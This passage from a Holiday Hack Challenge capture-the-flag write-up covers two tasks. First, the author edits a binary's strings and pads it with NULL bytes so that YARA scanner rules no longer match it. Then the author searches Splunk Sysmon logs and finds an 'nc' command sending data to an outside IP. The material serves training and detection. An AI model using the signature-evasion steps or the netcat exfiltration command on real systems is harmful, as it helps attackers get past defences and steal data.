&lt;li&gt;Harmony&lt;/li&gt;
&lt;li&gt;Magnanimity&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;The first ingredient is &lt;code&gt;Kindness&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-9"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id38"&gt;Objective 9:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="fitzy-shortstack-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id39"&gt;Fitzy Shortstack's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, the elves want to run an important program, but it keeps matching
Yara rules, which prevent its execution. Let's run it and see what happens:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;HELP!!!&lt;/span&gt;

&lt;span class="go"&gt;This critical application is supposed to tell us the sweetness levels of our candy&lt;/span&gt;
&lt;span class="go"&gt;manufacturing output (among other important things), but I can&amp;#39;t get it to run.&lt;/span&gt;

&lt;span class="go"&gt;It keeps saying something something yara. Can you take a look and see if you&lt;/span&gt;
&lt;span class="go"&gt;can help get this application to bypass Sparkle Redberry&amp;#39;s Yara scanner?&lt;/span&gt;

&lt;span class="go"&gt;If we can identify the rule that is triggering, we might be able change the program&lt;/span&gt;
&lt;span class="go"&gt;to bypass the scanner.&lt;/span&gt;

&lt;span class="go"&gt;We have some tools on the system that might help us get this application going:&lt;/span&gt;
&lt;span class="go"&gt;vim, emacs, nano, yara, and xxd&lt;/span&gt;

&lt;span class="go"&gt;The children will be very disappointed if their candy won&amp;#39;t even cause a single cavity.&lt;/span&gt;

&lt;span class="gp"&gt;snowball2@b1cc864746ad:~$&lt;/span&gt; ls
&lt;span class="go"&gt;the_critical_elf_app  yara_rules&lt;/span&gt;
&lt;span class="gp"&gt;snowball2@b1cc864746ad:~$&lt;/span&gt; ls yara_rules
&lt;span class="go"&gt;rules.yar&lt;/span&gt;
&lt;span class="gp"&gt;snowball2@b1cc864746ad:~$&lt;/span&gt; ./the_critical_elf_app
&lt;span class="hll"&gt;&lt;span class="go"&gt;yara_rule_135 ./the_critical_elf_app&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Okay, let's look at &lt;code&gt;yara_rule_135&lt;/code&gt; in &lt;code&gt;~/yara_rules/rules.yar&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;rule yara_rule_135 {
   meta:
      description = &amp;quot;binaries - file Sugar_in_the_machinery&amp;quot;
      author = &amp;quot;Sparkle Redberry&amp;quot;
      reference = &amp;quot;North Pole Malware Research Lab&amp;quot;
      date = &amp;quot;1955-04-21&amp;quot;
      hash = &amp;quot;19ecaadb2159b566c39c999b0f860b4d8fc2824eb648e275f57a6dbceaf9b488&amp;quot;
   strings:
&lt;span class="hll"&gt;      $s = &amp;quot;candycane&amp;quot;
&lt;/span&gt;   condition:
      $s
}
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This rule matches because our executable seems to have the string
&lt;code&gt;candycane&lt;/code&gt;. No worries, let's modify it using &lt;code&gt;sed&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;snowball2@97f97ea7e15f:~$&lt;/span&gt; sed -i &lt;span class="s1"&gt;&amp;#39;s/candycane/mandycane/g&amp;#39;&lt;/span&gt; ./the_critical_elf_app
&lt;span class="gp"&gt;snowball2@97f97ea7e15f:~$&lt;/span&gt; ./the_critical_elf_app
&lt;span class="hll"&gt;&lt;span class="go"&gt;yara_rule_1056 ./the_critical_elf_app&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we're matching against &lt;code&gt;yara_rule_1056&lt;/code&gt;. Let's tak a look at it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;rule yara_rule_1056 {
   meta:
        description = &amp;quot;binaries - file frosty.exe&amp;quot;
        author = &amp;quot;Sparkle Redberry&amp;quot;
        reference = &amp;quot;North Pole Malware Research Lab&amp;quot;
        date = &amp;quot;1955-04-21&amp;quot;
        hash = &amp;quot;b9b95f671e3d54318b3fd4db1ba3b813325fcef462070da163193d7acb5fcd03&amp;quot;
    strings:
&lt;span class="hll"&gt;        $s1 = {6c 6962 632e 736f 2e36}
&lt;/span&gt;&lt;span class="hll"&gt;        $hs2 = {726f 6772 616d 2121}
&lt;/span&gt;    condition:
        all of them
}
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we're matching this rule because our executable contains both these
hexadecimal strings. What are these strings?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;6c 6962 632e 736f 2e36&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; xxd -p -r
&lt;span class="go"&gt;libc.so.6&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;726f 6772 616d 2121&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; xxd -p -r
&lt;span class="go"&gt;rogram!!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Okay, the first string seems important, so let's modify the second string:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;snowball2@97f97ea7e15f:~$&lt;/span&gt; sed -i &lt;span class="s1"&gt;&amp;#39;s/rogram!!/rogram?!/g&amp;#39;&lt;/span&gt; the_critical_elf_app
&lt;span class="gp"&gt;snowball2@97f97ea7e15f:~$&lt;/span&gt; ./the_critical_elf_app
&lt;span class="hll"&gt;&lt;span class="go"&gt;yara_rule_1732 ./the_critical_elf_app&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we're matchin against &lt;code&gt;yara_rule_1732&lt;/code&gt;, let's take a look at it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;rule yara_rule_1732 {
   meta:
      description = &amp;quot;binaries - alwayz_winter.exe&amp;quot;
      author = &amp;quot;Santa&amp;quot;
      reference = &amp;quot;North Pole Malware Research Lab&amp;quot;
      date = &amp;quot;1955-04-22&amp;quot;
      hash = &amp;quot;c1e31a539898aab18f483d9e7b3c698ea45799e78bddc919a7dbebb1b40193a8&amp;quot;
   strings:
      $s1 = &amp;quot;This is critical for the execution of this program!!&amp;quot; fullword ascii
      $s2 = &amp;quot;__frame_dummy_init_array_entry&amp;quot; fullword ascii
      $s3 = &amp;quot;.note.gnu.property&amp;quot; fullword ascii
      $s4 = &amp;quot;.eh_frame_hdr&amp;quot; fullword ascii
      $s5 = &amp;quot;__FRAME_END__&amp;quot; fullword ascii
      $s6 = &amp;quot;__GNU_EH_FRAME_HDR&amp;quot; fullword ascii
      $s7 = &amp;quot;frame_dummy&amp;quot; fullword ascii
      $s8 = &amp;quot;.note.gnu.build-id&amp;quot; fullword ascii
      $s9 = &amp;quot;completed.8060&amp;quot; fullword ascii
      $s10 = &amp;quot;_IO_stdin_used&amp;quot; fullword ascii
      $s11 = &amp;quot;.note.ABI-tag&amp;quot; fullword ascii
      $s12 = &amp;quot;naughty string&amp;quot; fullword ascii
      $s13 = &amp;quot;dastardly string&amp;quot; fullword ascii
      $s14 = &amp;quot;__do_global_dtors_aux_fini_array_entry&amp;quot; fullword ascii
      $s15 = &amp;quot;__libc_start_main@@GLIBC_2.2.5&amp;quot; fullword ascii
      $s16 = &amp;quot;GLIBC_2.2.5&amp;quot; fullword ascii
      $s17 = &amp;quot;its_a_holly_jolly_variable&amp;quot; fullword ascii
      $s18 = &amp;quot;__cxa_finalize&amp;quot; fullword ascii
      $s19 = &amp;quot;HolidayHackChallenge{NotReallyAFlag}&amp;quot; fullword ascii
      $s20 = &amp;quot;__libc_csu_init&amp;quot; fullword ascii
   condition:
&lt;span class="hll"&gt;      uint32(1) == 0x02464c45 and filesize &amp;lt; 50KB and
&lt;/span&gt;&lt;span class="hll"&gt;      10 of them
&lt;/span&gt;}
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Oh boy, that's a lot of strings, and I'm not sure we can modify more than ten
of them to prevent the matching condition. But wait, there's another
condition: &lt;code&gt;filesize &amp;lt; 50KB&lt;/code&gt;. If we can modify our executable size so
that it's larger than 50 kB, we'll evade the matching rule.&lt;/p&gt;
&lt;p&gt;How big is our executable?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;snowball2@97f97ea7e15f:~$&lt;/span&gt; ls -lh ./the_critical_elf_app
&lt;span class="go"&gt;-rwxr-xr-x 1 snowball2 snowball2 17K Nov 24 15:51 ./the_critical_elf_app&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Around 17 kB. Let's add around 35 kB of NULL bytes at the end of our file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;snowball2@97f97ea7e15f:~$&lt;/span&gt; python3 -c &lt;span class="s2"&gt;&amp;quot;print(35000*&amp;#39;\x00&amp;#39;)&amp;quot;&lt;/span&gt; &amp;gt;&amp;gt; the_critical_elf_app
&lt;span class="gp"&gt;snowball2@97f97ea7e15f:~$&lt;/span&gt; ls -lh the_critical_elf_app
&lt;span class="hll"&gt;&lt;span class="go"&gt;-rwxr-xr-x 1 snowball2 snowball2 51K Dec 31 13:09 the_critical_elf_app&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Great, now it's bigger than 50 kB, so it shouldn't trigger our Yara rule:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;snowball2@97f97ea7e15f:~$&lt;/span&gt; ./the_critical_elf_app
&lt;span class="go"&gt;Machine Running..&lt;/span&gt;
&lt;span class="go"&gt;Toy Levels: Very Merry, Terry&lt;/span&gt;
&lt;span class="go"&gt;Naughty/Nice Blockchain Assessment: Untampered&lt;/span&gt;
&lt;span class="go"&gt;Candy Sweetness Gauge: Exceedingly Sugarlicious&lt;/span&gt;
&lt;span class="go"&gt;Elf Jolliness Quotient: 4a6f6c6c7920456e6f7567682c204f76657274696d6520417070726f766564&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="splunk"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id40"&gt;Splunk!&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;It's time for the blue-team challenge of KringleCon! We head over to &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/account/insecurelogin?username=user&amp;amp;password=kringlecon"&gt;the
Splunk interface&lt;/a&gt;
to see what's what:&lt;/p&gt;
&lt;blockquote&gt;
Eddie McJingles was a key DevOps engineer in Santa's North Pole Partner
Program, but he left suddenly. Your job is to document Eddie's project.&lt;/blockquote&gt;
&lt;p&gt;Alright, let's document what Eddie did, by going through the tasks laid before
us.&lt;/p&gt;
&lt;div class="section" id="task-1"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id41"&gt;Task 1&lt;/a&gt;&lt;/h4&gt;
&lt;blockquote&gt;
Capture the commands Eddie ran most often, starting with git. Looking only
at his process launches as reported by Sysmon, record the most common
git-related CommandLine that Eddie seemed to use.&lt;/blockquote&gt;
&lt;p&gt;By adapting the &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20user%3Deddie%20%0A%7C%20stats%20count%20by%20CommandLine%20%0A%7C%20sort%20-%20count"&gt;sample search for counting and sorting by most/least
common value of a field&lt;/a&gt;,
we can build the following filter, which will only match &lt;code&gt;CommandLines&lt;/code&gt;
that begins with &lt;code&gt;git&lt;/code&gt;, and sort them in descending order:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 user=eddie
| regex CommandLine = &amp;quot;^git.*$&amp;quot;
| stats count by CommandLine
| sort - count
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that the top result is git status, with a count of five occurrences." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_1.png" /&gt;
&lt;p&gt;We &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20user%3Deddie%0A%7C%20regex%20CommandLine%20%3D%20%22%5Egit.*%24%22%0A%7C%20stats%20count%20by%20CommandLine%0A%7C%20sort%20-%20count&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;sid=1640900796.1764&amp;amp;display.page.search.tab=statistics&amp;amp;display.general.type=statistics"&gt;launch our search&lt;/a&gt;,
and we can see that the most common &lt;code&gt;git&lt;/code&gt; command is &lt;code&gt;git status&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="task-2"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id42"&gt;Task 2&lt;/a&gt;&lt;/h4&gt;
&lt;blockquote&gt;
Looking through the git commands Eddie ran, determine the remote repository
that he configured as the origin for the 'partnerapi' repo. The correct
one!&lt;/blockquote&gt;
&lt;p&gt;We can go back to our previous filter, and modify our regular expression, so
that our &lt;code&gt;CommandLine&lt;/code&gt; begins with &lt;code&gt;git remote&lt;/code&gt;, since we're
looking for the configuration of an origin remote. We also sort by time in
ascending order, because apparently Eddie made a mistake, so we're looking for
the most recent origin definition:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 user=eddie
| regex CommandLine = &amp;quot;^git remote.*$&amp;quot;
| sort by _time
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that Eddie first defined the remote origin with URL https://github.com/elfnp3/partnerapi.git, but he then corrected it to use git&amp;#64;github.com:elfnp3/partnerapi.git." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_2.png" /&gt;
&lt;p&gt;We &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20user%3Deddie%0A%7C%20regex%20CommandLine%20%3D%20%22%5Egit%20remote.*%24%22%0A%7C%20sort%20by%20_time&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.page.search.tab=events&amp;amp;display.general.type=events&amp;amp;sid=1640900957.1767"&gt;launch our search&lt;/a&gt;,
and we see that Eddie did make a mistake:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;He first defined the origin with the command &lt;code&gt;git remote add origin https://github.com/elfnp3/partnerapi.git&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;He then deleted the remote called origin with the command &lt;code&gt;git remote remove origin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;He finally redefined origin with the command &lt;code&gt;git remote add origin git&amp;#64;github.com:elfnp3/partnerapi.git&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The remote repository used as the origin is therefore
&lt;code&gt;git&amp;#64;github.com:elfnp3/partnerapi.git&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="task-3"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id43"&gt;Task 3&lt;/a&gt;&lt;/h4&gt;
&lt;blockquote&gt;
Eddie was running Docker on his workstation. Gather the full command line
that Eddie used to bring up a the partnerapi project on his workstation.&lt;/blockquote&gt;
&lt;p&gt;Let's now filter on command lines that begin with the word &lt;code&gt;docker&lt;/code&gt;, with
the following filter:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 user=eddie
| regex CommandLine = &amp;quot;^docker.*&amp;quot;
| sort by _time
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that the only commands starting with docker are docker compose up and docker ps." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_3.png" /&gt;
&lt;p&gt;We &lt;a class="reference external" href="https://hhc21.bossworkshops.io/fr-FR/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20user%3Deddie%0A%7C%20regex%20CommandLine%20%3D%20%22%5Edocker.*%22%0A%7C%20sort%20by%20_time&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.page.search.tab=events&amp;amp;display.general.type=events&amp;amp;sid=1640901360.1770"&gt;launch our search&lt;/a&gt;,
and see that the command is either &lt;code&gt;docker compose up&lt;/code&gt; or &lt;code&gt;docker
ps&lt;/code&gt;. The former is most likely the correct answer.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="task-4"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id44"&gt;Task 4&lt;/a&gt;&lt;/h4&gt;
&lt;blockquote&gt;
Eddie had been testing automated static application security testing (SAST)
in GitHub. Vulnerability reports have been coming into Splunk in JSON
format via GitHub webhooks. Search all the events in the main index in
Splunk and use the sourcetype field to locate these reports. Determine the
URL of the vulnerable GitHub repository that the elves cloned for testing
and document it here. You will need to search outside of Splunk (try
GitHub) for the original name of the repository.&lt;/blockquote&gt;
&lt;p&gt;We can use the &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Dgithub_json"&gt;sample search for GitHub Webhook Events&lt;/a&gt;
to see that the elves used a repository with URL
&lt;code&gt;git://github.com/elfnp3/dvws-node.git&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can &lt;a class="reference external" href="https://duckduckgo.com/?q=dvws-node"&gt;search for &amp;quot;dvws-node&amp;quot; on DuckDuckGo&lt;/a&gt;
to see that the elves' repository comes from repository
&lt;a class="reference external" href="https://github.com/snoopysecurity/dvws-node"&gt;https://github.com/snoopysecurity/dvws-node&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="task-5"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id45"&gt;Task 5&lt;/a&gt;&lt;/h4&gt;
&lt;blockquote&gt;
Santa asked Eddie to add a JavaScript library from NPM to the 'partnerapi'
project. Determine the name of the library and record it here for our
workshop documentation.&lt;/blockquote&gt;
&lt;p&gt;Let's go back to filtering on &lt;code&gt;CommandLine&lt;/code&gt; to search for commands that
contain the string &lt;code&gt;npm install&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 user=eddie
| regex CommandLine = &amp;quot;.*npm install.*&amp;quot;
| sort by _time
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that Eddie used NPM to install a package called holiday-utils-js." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_5.png" /&gt;
&lt;p&gt;We &lt;a class="reference external" href="https://hhc21.bossworkshops.io/fr-FR/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D1%20user%3Deddie%0A%7C%20regex%20CommandLine%20%3D%20%22.*npm%20install.*%22%0A%7C%20sort%20by%20_time&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;sid=1640901708.1772"&gt;launch our search&lt;/a&gt;,
and see that Eddie used NPM to install a package called
&lt;code&gt;holiday-utils-js&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="task-6"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id46"&gt;Task 6&lt;/a&gt;&lt;/h4&gt;
&lt;blockquote&gt;
Another elf started gathering a baseline of the network activity that Eddie
generated. Start with &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20EventCode%3D3%20user%3Deddie%20NOT%20dest_ip%20IN%20(127.0.0.*)%20NOT%20dest_port%20IN%20(22%2C53%2C80%2C443)%20%0A%7C%20stats%20count%20by%20dest_ip%20dest_port&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;workload_pool=&amp;amp;earliest=0&amp;amp;latest=now"&gt;their search&lt;/a&gt;
and capture the full process_name field of anything that looks suspicious.&lt;/blockquote&gt;
&lt;p&gt;The search of the other elf returned to IP addresses: 192.30.255.113 and
54.175.69.219.&lt;/p&gt;
&lt;p&gt;Let's see what these IPs can be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; whois &lt;span class="m"&gt;192&lt;/span&gt;.30.255.113
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;NetRange:       192.30.252.0 - 192.30.255.255&lt;/span&gt;
&lt;span class="go"&gt;CIDR:           192.30.252.0/22&lt;/span&gt;
&lt;span class="go"&gt;NetName:        GITHUB-NET4-1&lt;/span&gt;
&lt;span class="go"&gt;NetHandle:      NET-192-30-252-0-1&lt;/span&gt;
&lt;span class="go"&gt;Parent:         NET192 (NET-192-0-0-0-0)&lt;/span&gt;
&lt;span class="go"&gt;NetType:        Direct Allocation&lt;/span&gt;
&lt;span class="go"&gt;OriginAS:       AS36459&lt;/span&gt;
&lt;span class="go"&gt;Organization:   GitHub, Inc. (GITHU)&lt;/span&gt;
&lt;span class="go"&gt;RegDate:        2012-11-15&lt;/span&gt;
&lt;span class="go"&gt;Updated:        2021-12-14&lt;/span&gt;
&lt;span class="go"&gt;Ref:            https://rdap.arin.net/registry/ip/192.30.252.0&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; whois &lt;span class="m"&gt;54&lt;/span&gt;.175.69.219
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;OrgName:        Amazon Technologies Inc.&lt;/span&gt;
&lt;span class="go"&gt;OrgId:          AT-88-Z&lt;/span&gt;
&lt;span class="go"&gt;Address:        410 Terry Ave N.&lt;/span&gt;
&lt;span class="go"&gt;City:           Seattle&lt;/span&gt;
&lt;span class="go"&gt;StateProv:      WA&lt;/span&gt;
&lt;span class="go"&gt;PostalCode:     98109&lt;/span&gt;
&lt;span class="go"&gt;Country:        US&lt;/span&gt;
&lt;span class="go"&gt;RegDate:        2011-12-08&lt;/span&gt;
&lt;span class="go"&gt;Updated:        2021-07-28&lt;/span&gt;
&lt;span class="go"&gt;Comment:        All abuse reports MUST include:&lt;/span&gt;
&lt;span class="go"&gt;Comment:        * src IP&lt;/span&gt;
&lt;span class="go"&gt;Comment:        * dest IP (your IP)&lt;/span&gt;
&lt;span class="go"&gt;Comment:        * dest port&lt;/span&gt;
&lt;span class="go"&gt;Comment:        * Accurate date/timestamp and timezone of activity&lt;/span&gt;
&lt;span class="go"&gt;Comment:        * Intensity/frequency (short log extracts)&lt;/span&gt;
&lt;span class="go"&gt;Comment:        * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.&lt;/span&gt;
&lt;span class="go"&gt;Ref:            https://rdap.arin.net/registry/entity/AT-88-Z&lt;/span&gt;


&lt;span class="go"&gt;OrgAbuseHandle: AEA8-ARIN&lt;/span&gt;
&lt;span class="go"&gt;OrgAbuseName:   Amazon EC2 Abuse&lt;/span&gt;
&lt;span class="go"&gt;OrgAbusePhone:  +1-206-266-4064&lt;/span&gt;
&lt;span class="go"&gt;OrgAbuseEmail:  abuse@amazonaws.com&lt;/span&gt;
&lt;span class="go"&gt;OrgAbuseRef:    https://rdap.arin.net/registry/entity/AEA8-ARIN&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The first IP is a GitHub IP address. The second one is an Amazon IP address,
most likely linked to an EC2 instance. Uh oh, could this be the IP address
of a remote box controlled by an attacker? One that could be used to exfiltrate
data?&lt;/p&gt;
&lt;p&gt;Let's take a look at processes that have 54.175.69.219 as a destination IP:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational dest_ip=54.175.69.219
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that the only process linked to this IP address has a PID of 6791." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_6_1.png" /&gt;
&lt;p&gt;&lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20dest_ip%3D54.175.69.219&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;workload_pool=&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.page.search.tab=events&amp;amp;display.general.type=events&amp;amp;sid=1640902144.1774"&gt;This search&lt;/a&gt;
only gives us one process, with PID &lt;code&gt;6791&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Let's take a closer look at this process:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational ProcessId=6791
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that the full process path is /usr/bin/nc.openbsd, with a command line equal to nc -q1 54.175.69.219 16842. We also see that the Parent Process ID is equal to 6788." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_6_2.png" /&gt;
&lt;p&gt;We &lt;a class="reference external" href="https://hhc21.bossworkshops.io/en-US/app/SA-hhc/search?q=search%20index%3Dmain%20sourcetype%3Djournald%20source%3DJournald%3AMicrosoft-Windows-Sysmon%2FOperational%20ProcessId%3D6791&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;workload_pool=&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.page.search.tab=events&amp;amp;display.general.type=events&amp;amp;sid=1640902255.1776&amp;amp;display.events.fields=%5B%22host%22%2C%22source%22%2C%22process_path%22%2C%22CommandLine%22%2C%22sourcetype%22%2C%22ProcessId%22%2C%22ParentProcessGuid%22%2C%22ParentProcessId%22%2C%22ProcessGuid%22%2C%22ProcessID%22%2C%22parent_process_name%22%2C%22head_commit.url%22%2C%22repository.archive_url%22%2C%22repository.git_url%22%5D"&gt;launch our search&lt;/a&gt;,
and we can see that the full &lt;code&gt;process_path&lt;/code&gt; is
&lt;code&gt;/usr/bin/nc.openbsd&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="task-7"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id47"&gt;Task 7&lt;/a&gt;&lt;/h4&gt;
&lt;blockquote&gt;
Uh oh. This documentation exercise just turned into an investigation.
Starting with the process identified in the previous task, look for
additional suspicious commands launched by the same parent process. One
thing to know about these Sysmon events is that Network connection events
don't indicate the parent process ID, but Process creation events do!
Determine the number of files that were accessed by a related process and
record it here.&lt;/blockquote&gt;
&lt;p&gt;We can see in our previous search that the Parent Process ID of our suspicious
process is 6788. Let's look for process creation events (&lt;code&gt;EventCode=1&lt;/code&gt;)
that match this PPID:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=1 ParentProcessId=6788
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="The result of our filter. We can see that a mysterious cat command was executed against six files." class="align-center" src="/images/sans-christmas-challenge-2021/splunk_task_7.png" /&gt;
